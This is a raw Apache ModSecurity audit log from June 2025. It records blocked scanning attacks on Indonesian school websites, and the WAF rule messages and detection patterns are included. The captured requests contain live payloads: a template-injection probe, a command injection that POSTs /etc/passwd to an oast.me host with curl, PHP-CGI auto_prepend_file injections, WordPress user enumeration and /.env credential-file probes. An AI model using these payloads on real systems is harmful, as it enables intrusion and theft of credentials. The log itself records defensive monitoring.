Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28a75554-Z-- --f241ec42-A-- [06/Jun/2025:03:39:49 +0700] aEIAlSrHpfaS2Cuwh8UOwAAAAEg 103.236.140.4 46808 103.236.140.4 8181 --f241ec42-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173412266 --f241ec42-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f241ec42-E-- --f241ec42-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749155989689643 2821 (- - -) Stopwatch2: 1749155989689643 2821; combined=1083, p1=435, p2=615, p3=0, p4=0, p5=32, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f241ec42-Z-- --05687329-A-- [06/Jun/2025:03:39:50 +0700] aEIAlirHpfaS2Cuwh8UOwQAAAEo 103.236.140.4 46808 103.236.140.4 8181 --05687329-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 192 User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173235672 --05687329-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0us2vpgpeonc6qdbef0gcj955w9nyntj.oast.me) --05687329-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05687329-E-- --05687329-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749155990684513 2050 (- - -) Stopwatch2: 1749155990684513 2050; combined=648, p1=394, p2=225, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05687329-Z-- --b1b7bd24-A-- [06/Jun/2025:03:47:46 +0700] aEICcmaFzeU7VUj_TDFzcAAAAAU 103.236.140.4 47120 103.236.140.4 8181 --b1b7bd24-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173412446 --b1b7bd24-C-- --b1b7bd24-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1b7bd24-E-- --b1b7bd24-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749156466360087 5545 (- - -) Stopwatch2: 1749156466360087 5545; combined=2909, p1=740, p2=2136, p3=0, p4=0, p5=33, sr=120, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1b7bd24-Z-- --e8985941-A-- [06/Jun/2025:03:47:47 +0700] aEICc2aFzeU7VUj_TDFzcQAAAAY 103.236.140.4 47124 103.236.140.4 8181 --e8985941-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173235860 --e8985941-C-- --e8985941-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8985941-E-- --e8985941-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1749156467687929 3557 (- - -) Stopwatch2: 1749156467687929 3557; combined=1809, p1=458, p2=1325, p3=0, p4=0, p5=26, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8985941-Z-- --f335a36e-A-- [06/Jun/2025:03:47:48 +0700] aEICdGaFzeU7VUj_TDFzcgAAAAc 103.236.140.4 47128 103.236.140.4 8181 --f335a36e-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173412449 --f335a36e-C-- --f335a36e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f335a36e-E-- --f335a36e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1749156468688318 2822 (- - -) Stopwatch2: 1749156468688318 2822; combined=1508, p1=337, p2=1147, p3=0, p4=0, p5=23, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f335a36e-Z-- --f49e7e50-A-- [06/Jun/2025:03:47:49 +0700] aEICdWaFzeU7VUj_TDFzcwAAAAg 103.236.140.4 47132 103.236.140.4 8181 --f49e7e50-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 37 User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173235863 --f49e7e50-C-- --f49e7e50-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f49e7e50-E-- --f49e7e50-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749156469691936 3335 (- - -) Stopwatch2: 1749156469691936 3335; combined=1843, p1=433, p2=1383, p3=0, p4=0, p5=27, sr=98, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f49e7e50-Z-- --9f81301f-A-- [06/Jun/2025:03:59:55 +0700] aEIFS9KrQJH3faNNWWAWfAAAAM4 103.236.140.4 47212 103.236.140.4 8181 --9f81301f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.24.62.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.24.62.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9f81301f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f81301f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749157195595115 3606 (- - -) Stopwatch2: 1749157195595115 3606; combined=1451, p1=494, p2=927, p3=0, p4=0, p5=30, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f81301f-Z-- --38e09b3f-A-- [06/Jun/2025:04:09:27 +0700] aEIHh2aFzeU7VUj_TDFzhwAAAA4 103.236.140.4 47358 103.236.140.4 8181 --38e09b3f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.160.145.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.160.145.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --38e09b3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38e09b3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749157767545456 3240 (- - -) Stopwatch2: 1749157767545456 3240; combined=1370, p1=488, p2=848, p3=0, p4=0, p5=34, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38e09b3f-Z-- --e0024c76-A-- [06/Jun/2025:04:14:29 +0700] aEIItWaFzeU7VUj_TDFziQAAABA 103.236.140.4 47362 103.236.140.4 8181 --e0024c76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.159.85.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.159.85.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e0024c76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0024c76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749158069554076 2938 (- - -) Stopwatch2: 1749158069554076 2938; combined=1158, p1=390, p2=744, p3=0, p4=0, p5=24, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0024c76-Z-- --e30e1b7c-A-- [06/Jun/2025:04:15:06 +0700] aEII2tKrQJH3faNNWWAWsAAAANU 103.236.140.4 47364 103.236.140.4 8181 --e30e1b7c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.91.89.167 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.91.89.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 Accept-Charset: utf-8 --e30e1b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e30e1b7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749158106182286 803 (- - -) Stopwatch2: 1749158106182286 803; combined=346, p1=305, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e30e1b7c-Z-- --d8f9021e-A-- [06/Jun/2025:04:16:44 +0700] aEIJPGaFzeU7VUj_TDFzjAAAABQ 103.236.140.4 47372 103.236.140.4 8181 --d8f9021e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.91.89.167 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.91.89.167 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/128.0 (x64 de) Accept-Charset: utf-8 --d8f9021e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8f9021e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749158204105830 883 (- - -) Stopwatch2: 1749158204105830 883; combined=312, p1=279, p2=0, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8f9021e-Z-- --5b447873-A-- [06/Jun/2025:04:16:47 +0700] aEIJP2aFzeU7VUj_TDFzjQAAABU 103.236.140.4 47374 103.236.140.4 8181 --5b447873-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.91.89.167 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.91.89.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Accept-Charset: utf-8 --5b447873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b447873-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749158207332465 645 (- - -) Stopwatch2: 1749158207332465 645; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b447873-Z-- --1e9afb22-A-- [06/Jun/2025:04:17:22 +0700] aEIJYmaFzeU7VUj_TDFzjgAAABY 103.236.140.4 47376 103.236.140.4 8181 --1e9afb22-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.91.89.167 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.91.89.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14816.131.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept-Charset: utf-8 --1e9afb22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e9afb22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749158242817877 879 (- - -) Stopwatch2: 1749158242817877 879; combined=326, p1=287, p2=0, p3=0, p4=0, p5=39, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e9afb22-Z-- --2eea3e31-A-- [06/Jun/2025:04:18:10 +0700] aEIJktKrQJH3faNNWWAWsgAAANg 103.236.140.4 47378 103.236.140.4 8181 --2eea3e31-B-- GET /.docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3844.0 Safari/537.36 Accept-Charset: utf-8 --2eea3e31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2eea3e31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749158290672093 922 (- - -) Stopwatch2: 1749158290672093 922; combined=385, p1=348, p2=0, p3=0, p4=0, p5=37, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2eea3e31-Z-- --0a057637-A-- [06/Jun/2025:04:32:16 +0700] aEIM4GaFzeU7VUj_TDFzmgAAABM 103.236.140.4 47418 103.236.140.4 8181 --0a057637-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 144.91.89.167 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 144.91.89.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept-Charset: utf-8 --0a057637-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a057637-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749159136683987 907 (- - -) Stopwatch2: 1749159136683987 907; combined=402, p1=364, p2=0, p3=0, p4=0, p5=38, sr=152, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a057637-Z-- --cc8b9d0b-A-- [06/Jun/2025:04:43:18 +0700] aEIPdmaFzeU7VUj_TDFzrgAAAAM 103.236.140.4 47488 103.236.140.4 8181 --cc8b9d0b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.62.83.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.62.83.252 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --cc8b9d0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc8b9d0b-H-- 